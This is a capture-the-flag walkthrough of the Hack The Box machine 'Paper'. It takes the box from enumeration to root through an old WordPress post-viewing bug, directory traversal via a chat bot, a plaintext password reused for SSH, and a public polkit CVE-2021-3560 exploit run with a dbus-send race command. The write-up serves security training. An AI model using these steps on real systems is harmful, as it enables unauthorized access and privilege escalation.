--- search: exclude: true --- # Paper Writeup ![](img/65.png) ## Introduction : Paper is an easy box released back in Febuary 2022 ## **Part 1 : Initial Enumeration** As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions. [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper] → sudo vim /etc/hosts [sudo] password for nothing: [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper] → ping paper.htb PING paper.htb (10.129.136.31) 56(84) bytes of data. 64 bytes from paper.htb (10.129.136.31): icmp_seq=1 ttl=63 time=24.9 ms ^C --- paper.htb ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 24.883/24.883/24.883/0.000 ms [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper] → nmap -sCV paper.htb Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-30 20:21 CEST Nmap scan report for paper.htb (10.129.136.31) Host is up (0.028s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.0 (protocol 2.0) | ssh-hostkey: | 2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA) | 256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA) |_ 256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519) 80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9) |_http-title: HTTP Server Test Page powered by CentOS | http-methods: |_ Potentially risky methods: TRACE |_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28 |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9 443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9) |_http-title: HTTP Server Test Page powered by CentOS |_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28 | http-methods: |_ Potentially risky methods: TRACE | tls-alpn: |_ http/1.1 |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US | Subject Alternative Name: DNS:localhost.localdomain | Not valid before: 2021-07-03T08:52:34 |_Not valid after: 2022-07-08T10:32:34 |_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9 Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.78 seconds ## **Part 2 : Getting User Access** Our nmap scan picked up port 80 running apache 2.4.37 which is most likely running CentOS. When we curl port 80 we see it displays another domain: [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper] → curl -v http://paper.htb * Trying 10.129.136.31:80... * Connected to paper.htb (10.129.136.31) port 80 (#0) GET / HTTP/1.1 Host: paper.htb User-Agent: curl/7.84.0 Accept: */* Mark bundle as not supporting multiuse HTTP/1.1 403 Forbidden Date: Tue, 30 Aug 2022 18:31:07 GMT Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9 X-Backend-Server: office.paper Last-Modified: Sun, 27 Jun 2021 23:47:13 GMT ETag: "30c0b-5c5c7fdeec240" Accept-Ranges: bytes Content-Length: 199691 Content-Type: text/html; charset=UTF-8 So we add the domain office.paper to our /etc/hosts file: [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper] → sudo vim /etc/hosts [sudo] password for nothing: [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper] → cat /etc/hosts | grep paper 10.129.136.31 paper.htb office.paper [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper] → ping office.paper PING paper.htb (10.129.136.31) 56(84) bytes of data. 64 bytes from paper.htb (10.129.136.31): icmp_seq=1 ttl=63 time=23.2 ms 64 bytes from paper.htb (10.129.136.31): icmp_seq=2 ttl=63 time=23.0 ms let's enumerate for other subdomains using wfuzz (we specify the wordlist we want to use and we hide 403 code responses): [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper] → wfuzz -u http://office.paper -H "Host: FUZZ.office.paper" -w /bedrock/strata/kali/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt --hc 403 ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://office.paper/ Total requests: 4989 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000000070: 200 507 L 13015 W 223163 Ch "chat" ^C /usr/lib/python3.10/site-packages/wfuzz/wfuzz.py:79: UserWarning:Finishing pending requests... Total time: 5.887163 Processed Requests: 192 Filtered Requests: 191 Requests/sec.: 32.61332 wfuzz found the chat.office.paper subdomain so let's also add it to our /etc/hosts file, then we browse it: ![](prg/65_001.png) And here we find a rocketchat instance. Let's go back to it after we get credentials. We move on back to the http site with the TLD office.paper: ![](prg/65_002.png) ![](prg/65_003.png) browsing to **http://office.paper/wp-admin** reveals that it is a wordpress site. So we run wpscan: [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper] → wpscan --url http://office.paper _______________________________________________________________ __ _______ _____ \ \ / / __ \ / ____| \ \ /\ / /| |__) | (___ ___ __ _ _ __ ® \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \ \ /\ / | | ____) | (__| (_| | | | | \/ \/ |_| |_____/ \___|\__,_|_| |_| WordPress Security Scanner by the WPScan Team Version 3.8.22 @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart _______________________________________________________________ [i] Updating the Database ... [i] Update completed. [+] URL: http://office.paper/ [10.129.136.31] [+] Started: Tue Aug 30 20:47:20 2022 Interesting Finding(s): [+] Headers | Interesting Entries: | - Server: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9 | - X-Powered-By: PHP/7.2.24 | - X-Backend-Server: office.paper | Found By: Headers (Passive Detection) | Confidence: 100% [+] WordPress readme found: http://office.paper/readme.html | Found By: Direct Access (Aggressive Detection) | Confidence: 100% **[+] WordPress version 5.2.3 identified (Insecure, released on 2019-09-05). | Found By: Rss Generator (Passive Detection) | - http://office.paper/index.php/feed/, generator>https://wordpress.org/?v=5.2.3/generator> | - http://office.paper/index.php/comments/feed/, generator>https://wordpress.org/?v=5.2.3/generator>** [+] WordPress theme in use: construction-techup | Location: http://office.paper/wp-content/themes/construction-techup/ | Last Updated: 2021-07-17T00:00:00.000Z | Readme: http://office.paper/wp-content/themes/construction-techup/readme.txt | [!] The version is out of date, the latest version is 1.4 | Style URL: http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1 | Style Name: Construction Techup | Description: Construction Techup is child theme of Techup a Free WordPress Theme useful for Business, corporate a... | Author: wptexture | Author URI: https://testerwp.com/ | | Found By: Css Style In Homepage (Passive Detection) | | Version: 1.1 (80% confidence) | Found By: Style (Passive Detection) | - http://office.paper/wp-content/themes/construction-techup/style.css?ver=1.1, Match: 'Version: 1.1' [+] Enumerating All Plugins (via Passive Methods) [i] No plugins Found. [+] Enumerating Config Backups (via Passive and Aggressive Methods) Checking Config Backups - Time: 00:00:00 <****=================================================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:00 [i] No Config Backups Found. [!] No WPScan API Token given, as a result vulnerability data has not been output. [!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register [+] Finished: Tue Aug 30 20:47:25 2022 [+] Requests Done: 185 [+] Cached Requests: 5 [+] Data Sent: 44.421 KB [+] Data Received: 18.75 MB [+] Memory used: 227.438 MB [+] Elapsed time: 00:00:04 So here this wordpress instance is vulnerable to CVE-2019-17671, which is basically a mistake which allows us to view published posts with the following PHP variable: **?static=1** which allows us to see all the other posts: ![](prg/65_004.png) here a secret post reveals to us the secret registering link, so let's use it to create an account: ![](prg/65_005.png) once we log in, we can see the following info: ![](prg/65_006.png) Basically there's a bot called recyclops and we can reach it via DM to type commands: ![](prg/65_007.png) We can list files with the command "list" ![](prg/65_008.png) And with directory traversal we see that there is a user on the box called "dwight". ![](prg/65_009.png) Going just one directory up we see the directory hubot containing a .env file with plaintext credentials: **recyclops/Queenofblad3s!23** , so let's check for password reuse with the user dwight: [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper] → crackmapexec ssh office.paper -u dwight -p 'Queenofblad3s!23' [*] First time use detected [*] Creating home directory structure [*] Creating default workspace [*] Initializing SMB protocol database [*] Initializing LDAP protocol database [*] Initializing SSH protocol database [*] Initializing MSSQL protocol database [*] Initializing WINRM protocol database [*] Copying default configuration file [*] Generating SSL certificate /usr/lib/python3/dist-packages/pywerview/requester.py:144: SyntaxWarning: "is not" with a literal. Did you mean "!="? if result['type'] is not 'searchResEntry': SSH paper.htb 22 office.paper [*] SSH-2.0-OpenSSH_8.0 SSH paper.htb 22 office.paper [+] dwight:Queenofblad3s!23 [ 10.0.0.10/16 ] [ nowhere ] [~/HTB/Paper] → ssh dwight@office.paper The authenticity of host 'office.paper (10.129.136.31)' can't be established. ED25519 key fingerprint is SHA256:9utZz963ewD/13oc9IYzRXf6sUEX4xOe/iUaMPTFInQ. This key is not known by any other names Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'office.paper' (ED25519) to the list of known hosts. dwight@office.paper's password: Activate the web console with: systemctl enable --now cockpit.socket Last login: Tue Feb 1 09:14:33 2022 from 10.10.14.23 [dwight@paper ~]$ id uid=1004(dwight) gid=1004(dwight) groups=1004(dwight) [dwight@paper ~]$ cat user.txt a0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX And we managed to log in and get the user flag! ## **Part 3 : Getting Root Access** Now in order to privesc let's enumerate the possible privesc paths using linpeas.sh: [term1] [dwight@paper ~]$ which wget curl /usr/bin/wget /usr/bin/curl [term2] [ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper] → wget https://github.com/carlospolop/PEASS-ng/releases/download/20220828/linpeas.sh --2022-08-30 21:12:52-- https://github.com/carlospolop/PEASS-ng/releases/download/20220828/linpeas.sh Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt' Resolving github.com (github.com)... 140.82.121.3 Connecting to github.com (github.com)|140.82.121.3|:443... connected. HTTP request sent, awaiting response... 302 Found Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/14f0a504-adb0-4d42-918e-9a222fa1ba90?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential;=AKIAIWNJYAX4CSVEH53A%2F20220830%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date;=20220830T191251Z&X-Amz-Expires;=300&X-Amz-Signature;=9743821c11a0ac568713ac91163de2aee6d92a3462a4cfe931bf777ecbafbc1e&X-Amz-SignedHeaders;=host&actor;_id=0&key;_id=0&repo;_id=165548191&response-content-disposition;=attachment%3B%20filename%3Dlinpeas.sh&response-content-type;=application%2Foctet-stream [following] --2022-08-30 21:12:53-- https://objects.githubusercontent.com/github-production-release-asset-2e65be/165548191/14f0a504-adb0-4d42-918e-9a222fa1ba90?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential;=AKIAIWNJYAX4CSVEH53A%2F20220830%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date;=20220830T191251Z&X-Amz-Expires;=300&X-Amz-Signature;=9743821c11a0ac568713ac91163de2aee6d92a3462a4cfe931bf777ecbafbc1e&X-Amz-SignedHeaders;=host&actor;_id=0&key;_id=0&repo;_id=165548191&response-content-disposition;=attachment%3B%20filename%3Dlinpeas.sh&response-content-type;=application%2Foctet-stream Resolving objects.githubusercontent.com (objects.githubusercontent.com)... 185.199.111.133, 185.199.108.133, 185.199.110.133, ... Connecting to objects.githubusercontent.com (objects.githubusercontent.com)|185.199.111.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 807205 (788K) [application/octet-stream] Saving to: ‘linpeas.sh’ linpeas.sh 100%[=======================================================================================================================================================>] 788.29K 4.40MB/s in 0.2s 2022-08-30 21:12:53 (4.40 MB/s) - ‘linpeas.sh’ saved [807205/807205] [ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper] → python3 -m http.server 9090 Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ... [term1] [dwight@paper ~]$ wget 10.10.14.13:9090/linpeas.sh --2022-08-30 15:13:45-- http://10.10.14.13:9090/linpeas.sh Connecting to 10.10.14.13:9090... connected. HTTP request sent, awaiting response... 200 OK Length: 807205 (788K) [application/x-sh] Saving to: ‘linpeas.sh’ linpeas.sh 100%[=======================================================================================================================================================>] 788.29K 2.00MB/s in 0.4s 2022-08-30 15:13:46 (2.00 MB/s) - ‘linpeas.sh’ saved [807205/807205] [dwight@paper ~]$ chmod +x linpeas.sh [dwight@paper ~]$ ./linpeas.sh ` ![](prg/65_010.png) ![](prg/65_011.png) Here we see that there should be a buffer overflow vulnerability with the sudo binary, vulnerability nicknamed "Baron Samedit". To check if it is vulnerable we need to run **sudoedit -s /** and if it returns **sudoedit /: not a regular file** then it is vulnerable: [dwight@paper ~]$ sudoedit -s / usage: sudoedit [-AknS] [-r role] [-t type] [-C num] [-g group] [-h host] [-p prompt] [-T timeout] [-u user] file ... It's not, however linpeas.sh also picked up that the VM is vulnerable to CVE-2021-3560, so let's exploit it as follows: [term1] [ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper] → wget https://raw.githubusercontent.com/curtishoughton/CVE-2021-3560/master/CVE-2021-3560.py --2022-08-30 21:29:20-- https://raw.githubusercontent.com/curtishoughton/CVE-2021-3560/master/CVE-2021-3560.py Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt' Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.109.133, ... Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 2803 (2.7K) [text/plain] Saving to: ‘CVE-2021-3560.py’ CVE-2021-3560.py 100%[=======================================================================================================================================================>] 2.74K --.-KB/s in 0.001s 2022-08-30 21:29:20 (4.58 MB/s) - ‘CVE-2021-3560.py’ saved [2803/2803] [ 10.10.14.13/23 ] [ nowhere ] [~/HTB/Paper] → python3 -m http.server 9090 Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ... 10.129.136.31 - - [30/Aug/2022 21:29:45] "GET /CVE-2021-3560.py HTTP/1.1" 200 - [term2] [dwight@paper ~]$ wget http://10.10.14.13:9090/CVE-2021-3560.py --2022-08-30 15:29:44-- http://10.10.14.13:9090/CVE-2021-3560.py Connecting to 10.10.14.13:9090... connected. HTTP request sent, awaiting response... 200 OK Length: 2803 (2.7K) [text/x-python] Saving to: ‘CVE-2021-3560.py’ CVE-2021-3560.py 100%[=======================================================================================================================================================>] 2.74K --.-KB/s in 0s 2022-08-30 15:29:44 (123 MB/s) - ‘CVE-2021-3560.py’ saved [2803/2803] [dwight@paper ~]$ which python python3 /usr/bin/which: no python in (/home/dwight/.local/bin:/home/dwight/bin:/usr/local/bin:/usr/bin:/usr/local/sbin:/usr/sbin) /usr/bin/python3 [dwight@paper ~]$ python3 CVE-2021-3560.py ##############CVE-2021-3560############## # __________ .__ __ .__ __ # # \______ \____ | | | | _|__|/ |_ # # | ___/ _ \| | | |/ / \ __\ # # | | ( <****_> ) |_| | || | # # |____| \____/|____/__|_ \__||__| # # \/ # # Local Privilege Escalation Exploit # # Author: Salman Asad (@deathflash1411) # ######################################### [+] User created! [+] Username: flash [+] User ID: 1005 [!] Run the below command a few times ( <****10) and login via su - flash dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1005 org.freedesktop.Accounts.User.SetPassword string:'$5$HPVUSULZZ8BMl4wE$zisRakxfq9IDf7mY0FUteDiKtYYRjmGkf3RAUjFE2P2' string:GoldenEye & sleep 0.005s ; kill $! [dwight@paper ~]$ So let's follow the script's instructions: [dwight@paper ~]$ python3 CVE-2021-3560.py ##############CVE-2021-3560############## [+] User created! [+] Username: flash [+] User ID: 1005 [!] Run the below command a few times (<****10) and login via su - flash [dwight@paper ~]$ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-reply /org/freedesktop/Accounts/User1005 org.freedesktop.Accounts.User.SetPassword string:'$5$HPVUSULZZ8BMl4wE$zisRakxfq9IDf7mY0FUteDiKtYYRjmGkf3RAUjFE2P2' string:GoldenEye [dwight@paper ~]$ su - flash Password: [flash@paper ~]$ id uid=1005(flash) gid=1005(flash) groups=1005(flash),10(wheel) [flash@paper ~]$ sudo su We trust you have received the usual lecture from the local System Administrator. It usually boils down to these three things: #1) Respect the privacy of others. #2) Think before you type. #3) With great power comes great responsibility. [sudo] password for flash: [root@paper flash]# id uid=0(root) gid=0(root) groups=0(root) [root@paper flash]# cat /root/root.txt 2fXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX And that's it! We managed to get the root flag! ## **Conclusion** Here we can see the progress graph : ![](img/65_graph.png)